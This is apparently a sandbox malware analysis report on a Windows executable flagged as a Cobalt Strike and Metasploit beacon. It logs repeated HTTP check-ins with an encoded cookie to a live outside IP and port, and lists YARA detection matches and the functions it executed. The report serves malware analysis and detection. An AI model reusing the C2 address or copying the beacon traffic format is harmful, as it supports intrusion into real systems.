Jan 9, 2025 23:09:33.710886002 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:34.659816027 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:34 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.4	50133	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:34.777096987 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:35.732075930 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:35 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.4	50134	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:35.852982044 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:36.778964996 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:36 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.4	50135	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:37.092376947 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:38.037528992 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:37 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.4	50136	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:38.150073051 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:39.082575083 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:38 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.4	50137	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:39.195741892 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:40.161576986 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:39 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.4	50138	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:40.293301105 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:41.265167952 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:41 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.4	50139	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:41.383769035 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:42.315531969 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:42 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.4	50140	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:42.433341980 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:43.375273943 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:43 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.4	50141	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:43.501667023 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:44.464202881 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:44 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.4	50142	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:44.599025011 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:45.528173923 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:45 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.4	50143	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:45.648880005 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:46.600234032 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:46 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.4	50144	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:46.711127043 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:47.666987896 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:47 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.4	50145	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:47.789864063 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:48.749830008 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:48 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.4	50146	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:48.873384953 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:49.824963093 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:49 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.4	50147	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:49.944335938 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:50.897445917 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:50 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.4	50148	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:51.008116961 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:51.951117992 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:51 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.4	50149	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:52.073364973 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:53.012048960 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:52 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.4	50150	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:53.133071899 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:54.103575945 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:53 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.4	50151	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:54.227792025 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:55.172177076 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:55 GMT Content-Type: application/octet-stream Content-Length: 0

Target ID:	0
Start time:	17:06:57
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\THsSNYblMw.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\THsSNYblMw.exe"
Imagebase:	0x400000
File size:	9'728 bytes
MD5 hash:	16C39B54B46A69CA6950FFA93B7DDA3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.4147448292.00000000001B0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4147448292.00000000001B0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.4147448292.00000000001B0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.4147448292.00000000001B0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	97.1%
Signature Coverage:	4.1%
Total number of Nodes:	241
Total number of Limit Nodes:	11

Executed Functions

Function 006AE3A4 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 152
networkfileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_snprintf.LIBCMT ref: 006AE43D

Part of subcall function 006BD57C: _errno.LIBCMT ref: 006BD5B3
Part of subcall function 006BD57C: _invalid_parameter_noinfo.LIBCMT ref: 006BD5BE

Part of subcall function 006B61C0: _snprintf.LIBCMT ref: 006B632D

_snprintf.LIBCMT ref: 006AE497
_snprintf.LIBCMT ref: 006AE4AE
HttpOpenRequestA.WININET ref: 006AE4F3
HttpSendRequestA.WININET ref: 006AE524
InternetQueryDataAvailable.WININET ref: 006AE554
InternetCloseHandle.WININET ref: 006AE572
InternetReadFile.WININET ref: 006AE5AE
InternetCloseHandle.WININET ref: 006AE5CF

Strings

*/*, xrefs: 006AE3E4
%s%s, xrefs: 006AE4A3

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: Internet_snprintf$CloseHandleHttpRequest$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
String ID: %s%s$*/*
API String ID: 1419689450-856325523
Opcode ID: 7aecab8f94b4036c401f8696ecf09a78fedfdcc2f5ec1353f6b97f9b95c732dc
Instruction ID: 8616b158e545b827149862de7a37da5836515c83b9f69156fa5213d2d2f10528
Opcode Fuzzy Hash: 7aecab8f94b4036c401f8696ecf09a78fedfdcc2f5ec1353f6b97f9b95c732dc
Instruction Fuzzy Hash: 6C51D472B0478086EB50EF62F8007DE77A6F789B98F404126EE4957B54EF3AC945CB40

Function 00401180 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 205
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 004011E6
SetUnhandledExceptionFilter.KERNEL32 ref: 00401258
malloc.MSVCRT ref: 00401322
strlen.MSVCRT ref: 00401345
malloc.MSVCRT ref: 00401351
memcpy.MSVCRT ref: 00401365
GetStartupInfoA.KERNEL32 ref: 00401463

Strings

@P@, xrefs: 00401231

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
String ID: @P@
API String ID: 649803965-1136412694
Opcode ID: 8714a0a53b85a68ae96850f99c5d82bd34b46371170b9fae7742097e0e5346d9
Instruction ID: 77c4c0c2c4ec01c18778b245383d7dec7d454e94fa0d5fd388002b9db963459a
Opcode Fuzzy Hash: 8714a0a53b85a68ae96850f99c5d82bd34b46371170b9fae7742097e0e5346d9
Instruction Fuzzy Hash: C6818BB1601B0486EB259F56E99476A33A1F745B88F84803BDF48773A1DF7CC884C748

